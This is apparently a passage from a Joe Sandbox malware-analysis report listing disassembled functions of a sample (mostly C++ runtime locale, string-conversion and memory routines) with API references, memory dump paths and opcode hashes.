_Maklocstr.LIBCPMT ref: 00007FF6D9C0B388

Strings

:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF6D9C0B363
:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF6D9C0B322
:AM:am:PM:pm, xrefs: 00007FF6D9C0B381

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Maklocstr
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 2987148671-35662545
Opcode ID: 8867adb2efc359ccc5cf0888d9ee80204fd664f335f1ca01bc21afa1361553cf
Instruction ID: 23d0dabafa4ebbe174d5afb41af2d8c3c861191edcede8f3310b0d8a955fe11c
Opcode Fuzzy Hash: 8867adb2efc359ccc5cf0888d9ee80204fd664f335f1ca01bc21afa1361553cf
Instruction Fuzzy Hash: AF213A66A09B4581EB10EF22E4402BD77B5EB99FC0F498232EA4D83756DF3CE152C740

Function 00007FF6D9BF5E40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00007FF6D9BF5E5C
CloseHandle.KERNEL32 ref: 00007FF6D9BF5F36

Part of subcall function 00007FF6D9BF58D0: GetSystemDirectoryW.KERNEL32 ref: 00007FF6D9BF591E
Part of subcall function 00007FF6D9BF58D0: LoadLibraryExW.KERNEL32 ref: 00007FF6D9BF59E8
Part of subcall function 00007FF6D9BF58D0: GetLastError.KERNEL32 ref: 00007FF6D9BF5A34

GetProcAddress.KERNEL32 ref: 00007FF6D9BF5EB8
GetLastError.KERNEL32 ref: 00007FF6D9BF5EF4
FreeLibrary.KERNEL32 ref: 00007FF6D9BF5F16

Strings

NtQueryInformationProcess, xrefs: 00007FF6D9BF5EB1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorLastLibrary$AddressCloseDirectoryFreeHandleLoadOpenProcProcessSystem
String ID: NtQueryInformationProcess
API String ID: 3957113498-2781105232
Opcode ID: 50f8b74b772799a49a32d1d3bf22bba6da5a932b56011529cbe8cc636982945b
Instruction ID: 2f44439b132de1070fc0765603f228fc1ac242e40e7716a2b4f4cee3514876d5
Opcode Fuzzy Hash: 50f8b74b772799a49a32d1d3bf22bba6da5a932b56011529cbe8cc636982945b
Instruction Fuzzy Hash: 61316A36A0DB8186E650CF11A84037EA7B0FBC9794F554136EA8D83A68DF7DE4A5CB00

Function 00007FF6D9C4CF5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6D9C4CF8D
GetLastError.KERNEL32 ref: 00007FF6D9C4CF99
CloseHandle.KERNEL32 ref: 00007FF6D9C4CFB1
CreateFileW.KERNEL32 ref: 00007FF6D9C4CFDC
WriteConsoleW.KERNEL32 ref: 00007FF6D9C4CFFB

Strings

CONOUT$, xrefs: 00007FF6D9C4CFBD

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5465c1afd9a73e2e95b374ed2fdb82802a84666fe34a4e0e565d8d339bcb1e90
Instruction ID: d869cf06be0db0ad21bc87e7465b7dd0b73ca4e70f7af6b8fb3239fc051934a9
Opcode Fuzzy Hash: 5465c1afd9a73e2e95b374ed2fdb82802a84666fe34a4e0e565d8d339bcb1e90
Instruction Fuzzy Hash: A3117C31B18A4186E7909F12A84433D62B0BB98FE4F400236EA1EC77A4DF3CE424C744

Function 00007FF6D9C2790C Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D9C279B9
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D9C27A55
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D9C27AFE
MultiByteToWideChar.KERNEL32 ref: 00007FF6D9C27B28
MultiByteToWideChar.KERNEL32 ref: 00007FF6D9C27BD0
CompareStringEx.KERNEL32 ref: 00007FF6D9C27C1D

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 66e74323a14d1237dec483e39549143d7bd7bee4ec2659615b9cae67baf7f054
Instruction ID: 180b3854cd168aac0296763ac73845c90de483d0badcde2b8c0e62270899088b
Opcode Fuzzy Hash: 66e74323a14d1237dec483e39549143d7bd7bee4ec2659615b9cae67baf7f054
Instruction Fuzzy Hash: 8FA19C62B087828AEB319F2484903BD77B1EB40BE8F546633DA5D97AC5DF3DE5648340

Function 00007FF6D9C271BC Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6D9C2722C
MultiByteToWideChar.KERNEL32 ref: 00007FF6D9C272CA
LCMapStringEx.KERNEL32 ref: 00007FF6D9C27333
LCMapStringEx.KERNEL32 ref: 00007FF6D9C27385
LCMapStringEx.KERNEL32 ref: 00007FF6D9C2742A
WideCharToMultiByte.KERNEL32 ref: 00007FF6D9C27484

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 3c0acbd00b743a7012fd7b87341e47bb8f94db9b826abeb19d5b1ae6d54c1ea2
Instruction ID: 41b8436ef3de1e03faac1b02b8f7f68db88b6b1c7f3a11d8334de1ea04e16c1e
Opcode Fuzzy Hash: 3c0acbd00b743a7012fd7b87341e47bb8f94db9b826abeb19d5b1ae6d54c1ea2
Instruction Fuzzy Hash: 82818C72B0978286EB208F25A48027D76F5FB54BE8F145632EA5D87BD9DF3CE4608710

Function 00007FF6D9C376AC Relevance: 9.2, APIs: 6, Instructions: 156COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C3771E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C3774F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C3778E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C377D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C37805
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C37881

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f81326ee9d92757cd56833d181037053bdd52f514750a2f53ce31003b409b3cc
Instruction ID: 9582e19f910752ed67f1f0c852c54154deab4b6e6cea6e2dc98c3761e5900bad
Opcode Fuzzy Hash: f81326ee9d92757cd56833d181037053bdd52f514750a2f53ce31003b409b3cc
Instruction Fuzzy Hash: 4B518326A0D68686E7629F34D0603BD3BF19F56BC4F448033D68C97386DE2D9866C702

Function 00007FF6D9BF6690 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BF674C
LocalFree.KERNEL32 ref: 00007FF6D9BF6805
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BF683B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF6847
LocalFree.KERNEL32 ref: 00007FF6D9BF685D

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$Free$AllocConcurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 4037287460-0
Opcode ID: e644cd8ea09a4508aa4ced8792a3a2c06cc0b0e59cf1b23194b986bca74f8d05
Instruction ID: 0feb71839e39c387ca7fdfc94b166bf01d8abbd0f2df01ac91004a9c3a53433d
Opcode Fuzzy Hash: e644cd8ea09a4508aa4ced8792a3a2c06cc0b0e59cf1b23194b986bca74f8d05
Instruction Fuzzy Hash: C251E36AB05B4A86EA18CF65D44427E6360FB09BE8F51863ADF6D877C4CF3DE4618300

Function 00007FF6D9BFABD0 Relevance: 9.1, APIs: 6, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BFAC33
LocalAlloc.KERNEL32 ref: 00007FF6D9BFAC69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFACE8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFACEE
LocalFree.KERNEL32 ref: 00007FF6D9BFAD48
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFAD74

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$Alloc_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFree
String ID:
API String ID: 1577144837-0
Opcode ID: 002792494f8d74684d2c5423764b666f5d3601d0c9efcc69f0908dc1352b7959
Instruction ID: 382d35504c2a0fa74048d023f5a01ad7e9a04fb9c4a16c7bcd71be4fb68f3780
Opcode Fuzzy Hash: 002792494f8d74684d2c5423764b666f5d3601d0c9efcc69f0908dc1352b7959
Instruction Fuzzy Hash: 6841B47A709B4581EA08CF25E44426E63A5FB88BD4F154636DFAD47B98EE3DD061C300

Function 00007FF6D9C21B9C Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21BB1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21BD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21C00
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C21C77
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21C98
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C21CAB

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: e4f0fcc02155ab2045ba3d1d05d20b990752452ab997ddad45090bebc877272c
Instruction ID: 7649b4594ef5b3acc1ae04ebe2128bcab0212ebecc64bdbbd9f64251001fbf77
Opcode Fuzzy Hash: e4f0fcc02155ab2045ba3d1d05d20b990752452ab997ddad45090bebc877272c
Instruction Fuzzy Hash: 6B418E26A09A4281EB259F16E8801BD7371EF94BD0F185533EA5D877A6EF7CE472C300

Function 00007FF6D9C118E4 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C118F9
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1191E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11948
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C119BF
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C119E0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C119F3

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 901851fa2b833e1742f365ec31cf967296e1508a00f7142b07edae039649f84d
Instruction ID: 8dde125036f42552c3070eabb9ffdd2145825702fbe69605d06be1dcacc2f82e
Opcode Fuzzy Hash: 901851fa2b833e1742f365ec31cf967296e1508a00f7142b07edae039649f84d
Instruction Fuzzy Hash: 7941A222A19A4681FB15AF26E4401BD6370EF95BD0F181633EE5DD72A6EE3CE461C340

Function 00007FF6D9C05CF0 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C05D05
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C05D2A
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05D54
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C05DCB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05DEC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C05DFF

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 51d212c152bdcff1e4d21c0728e2fcb4c36014acc0634747f696d28f05a69bc3
Instruction ID: e81aae8e13036496c1a5cf0b6bddf988da6cac772adec745fef941d75ae3ce76
Opcode Fuzzy Hash: 51d212c152bdcff1e4d21c0728e2fcb4c36014acc0634747f696d28f05a69bc3
Instruction Fuzzy Hash: 38319562A1968682FB15AF57D98417D7370EF94BE0F180233DE4D872A5DE7CE462C340

Function 00007FF6D9BFCBB0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFCBC5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFCBEA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFCC15
std::_Facet_Register.LIBCPMT ref: 00007FF6D9BFCC8C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFCCB6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFCCC9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 8d2c100bf9d2e0600e1ef22c7a39249ddffb1c26514391e28490c7320da19440
Instruction ID: fdeec91a2ff09e55dd8808c30e50dbc1f36c035c1f11125ce325a6c0b5de25c7
Opcode Fuzzy Hash: 8d2c100bf9d2e0600e1ef22c7a39249ddffb1c26514391e28490c7320da19440
Instruction Fuzzy Hash: 2F31B366A0964681EB059F16E84027D7371FB55BD8F090233DA4DC73A5DE7EE4A2C340

Function 00007FF6D9C05AC0 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C05AD5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C05AFA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05B24
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C05B9B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05BBC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C05BCF

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 1cd675cdae4b30848f1e2c8f88ee6aecfb470c339a9554a1e8ee825deec7a2ae
Instruction ID: 88889a2f677c9326aee8caab4764f5c99efbe6d8eeb492010c95a811af8647cb
Opcode Fuzzy Hash: 1cd675cdae4b30848f1e2c8f88ee6aecfb470c339a9554a1e8ee825deec7a2ae
Instruction Fuzzy Hash: 15318362A09A8642EB159F57E8801BD6371EB54BE0F180233DA4DC77E5EE7CF462C340

Function 00007FF6D9C21A84 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21A99
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21ABE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21AE8
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C21B5F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21B80
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C21B93

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 8dbff8bf7bcca8e6b7daddbe81a1f843d72d1fc32ee4c2ed7e84790663cf9c26
Instruction ID: bc7ac1cdb75c782842c5e6322f681781729db8a7cc2a0e6e92ba0e92fb1d55da
Opcode Fuzzy Hash: 8dbff8bf7bcca8e6b7daddbe81a1f843d72d1fc32ee4c2ed7e84790663cf9c26
Instruction Fuzzy Hash: CE319262A09A4685FB299F16E4801BD7371EF44BE4F181233DA1DC76E6EE7CE462C340

Function 00007FF6D9C059A8 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C059BD
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C059E2
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05A0C
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C05A83
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05AA4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C05AB7

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: ff08806b4226c0067b6b0812c526be4dac25bd622191c0632b052790350db230
Instruction ID: e9b8e623d9ef14dfb6de0e3714e6a56f0a0015e9444af78fc515fcf7450954d6
Opcode Fuzzy Hash: ff08806b4226c0067b6b0812c526be4dac25bd622191c0632b052790350db230
Instruction Fuzzy Hash: 6831B662A1968286EB159F97E88017D6371FB54BD4F090233DA4DC77A5EE7DE462C300

Function 00007FF6D9C2196C Relevance: 9.1, APIs: 6, Instructions: 81COMMON

